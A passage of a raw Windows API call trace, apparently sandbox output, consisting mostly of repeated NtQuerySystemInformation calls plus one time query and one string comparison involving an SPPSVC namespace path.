SystemInformation=0xc751dfe7c0, Length=0x38, ResultLength=0x0) [0210.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe640, Length=0x20, ResultLength=0x0) [0210.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5d0, Length=0x20, ResultLength=0x0) [0210.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5d0, Length=0x20, ResultLength=0x0) [0210.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.145] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc751dfea30 | out: lpSystemTimeAsFileTime=0xc751dfea30*(dwLowDateTime=0xde88b4ca, dwHighDateTime=0x1d5fb6e)) [0210.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe700, Length=0x50, ResultLength=0x0) [0210.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe700, Length=0x50, ResultLength=0x0) [0210.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe700, Length=0x50, ResultLength=0x0) [0210.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5f0, Length=0x50, ResultLength=0x0) [0210.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5f0, Length=0x50, ResultLength=0x0) [0210.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5f0, Length=0x50, ResultLength=0x0) [0210.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5f0, Length=0x50, ResultLength=0x0) [0210.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe520, Length=0x38, ResultLength=0x0) [0210.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe350, Length=0x28, ResultLength=0x0) [0210.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe350, Length=0x28, ResultLength=0x0) [0210.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe350, Length=0x28, ResultLength=0x0) [0210.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe350, Length=0x28, ResultLength=0x0) [0210.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe3c0, Length=0x28, ResultLength=0x0) [0210.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe520, Length=0x38, ResultLength=0x0) [0210.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe440, Length=0x28, ResultLength=0x0) [0210.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe440, Length=0x28, ResultLength=0x0) [0210.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe2e0, Length=0x20, ResultLength=0x0) [0210.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe260, Length=0x20, ResultLength=0x0) [0210.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe260, Length=0x20, ResultLength=0x0) [0210.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe260, Length=0x20, ResultLength=0x0) [0210.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe520, Length=0x38, ResultLength=0x0) [0210.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe520, Length=0x38, ResultLength=0x0) [0210.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe3a0, Length=0x20, ResultLength=0x0) [0210.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe330, Length=0x20, ResultLength=0x0) [0210.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe330, Length=0x20, ResultLength=0x0) [0210.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe860, Length=0x50, ResultLength=0x0) [0210.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe860, Length=0x50, ResultLength=0x0) [0210.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe860, Length=0x50, ResultLength=0x0) [0210.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe750, Length=0x50, ResultLength=0x0) [0210.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe750, Length=0x50, ResultLength=0x0) [0210.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe750, Length=0x50, ResultLength=0x0) [0210.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe750, Length=0x50, ResultLength=0x0) [0210.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x38, ResultLength=0x0) [0210.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4b0, Length=0x28, ResultLength=0x0) [0210.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4b0, Length=0x28, ResultLength=0x0) [0210.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4b0, Length=0x28, ResultLength=0x0) [0210.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe520, Length=0x28, ResultLength=0x0) [0210.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x38, ResultLength=0x0) [0210.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5a0, Length=0x28, ResultLength=0x0) [0210.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5a0, Length=0x28, ResultLength=0x0) [0210.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x38, ResultLength=0x0) [0210.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe500, Length=0x20, ResultLength=0x0) [0210.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe480, Length=0x20, ResultLength=0x0) [0210.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe480, Length=0x20, ResultLength=0x0) [0210.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe480, Length=0x20, ResultLength=0x0) [0210.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x38, ResultLength=0x0) [0210.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe500, Length=0x20, ResultLength=0x0) [0210.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe490, Length=0x20, ResultLength=0x0) [0210.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe490, Length=0x20, ResultLength=0x0) [0210.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe860, Length=0x50, ResultLength=0x0) [0210.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe860, Length=0x50, ResultLength=0x0) [0210.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe860, Length=0x50, ResultLength=0x0) [0210.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe750, Length=0x50, ResultLength=0x0) [0210.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe750, Length=0x50, ResultLength=0x0) [0210.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe750, Length=0x50, ResultLength=0x0) [0210.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe750, Length=0x50, ResultLength=0x0) [0210.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x38, ResultLength=0x0) [0210.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4b0, Length=0x28, ResultLength=0x0) [0210.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4b0, Length=0x28, ResultLength=0x0) [0210.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4b0, Length=0x28, ResultLength=0x0) [0210.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe520, Length=0x28, ResultLength=0x0) [0210.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x38, ResultLength=0x0) [0210.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5a0, Length=0x28, ResultLength=0x0) [0210.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5a0, Length=0x28, ResultLength=0x0) [0210.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x38, ResultLength=0x0) [0210.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe500, Length=0x20, ResultLength=0x0) [0210.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe480, Length=0x20, ResultLength=0x0) [0210.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe480, Length=0x20, ResultLength=0x0) [0210.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe480, Length=0x20, ResultLength=0x0) [0210.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x38, ResultLength=0x0) [0210.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe500, Length=0x20, ResultLength=0x0) [0210.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe490, Length=0x20, ResultLength=0x0) [0210.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe490, Length=0x20, ResultLength=0x0) [0210.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe910, Length=0x50, ResultLength=0x0) [0210.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe890, Length=0x28, ResultLength=0x0) [0210.175] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0210.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe910, Length=0x50, ResultLength=0x0) [0210.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe910, Length=0x50, ResultLength=0x0) [0210.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe910, Length=0x50, ResultLength=0x0) [0210.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe840, Length=0x38, ResultLength=0x0) [0210.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe670, Length=0x28, ResultLength=0x0) [0210.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe670, Length=0x28, ResultLength=0x0) [0210.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe670, Length=0x28, ResultLength=0x0) [0210.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6e0, Length=0x28, ResultLength=0x0) [0210.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe840, Length=0x38, ResultLength=0x0) [0210.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe760, Length=0x28, ResultLength=0x0) [0210.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.195] NtQuerySystemInformation 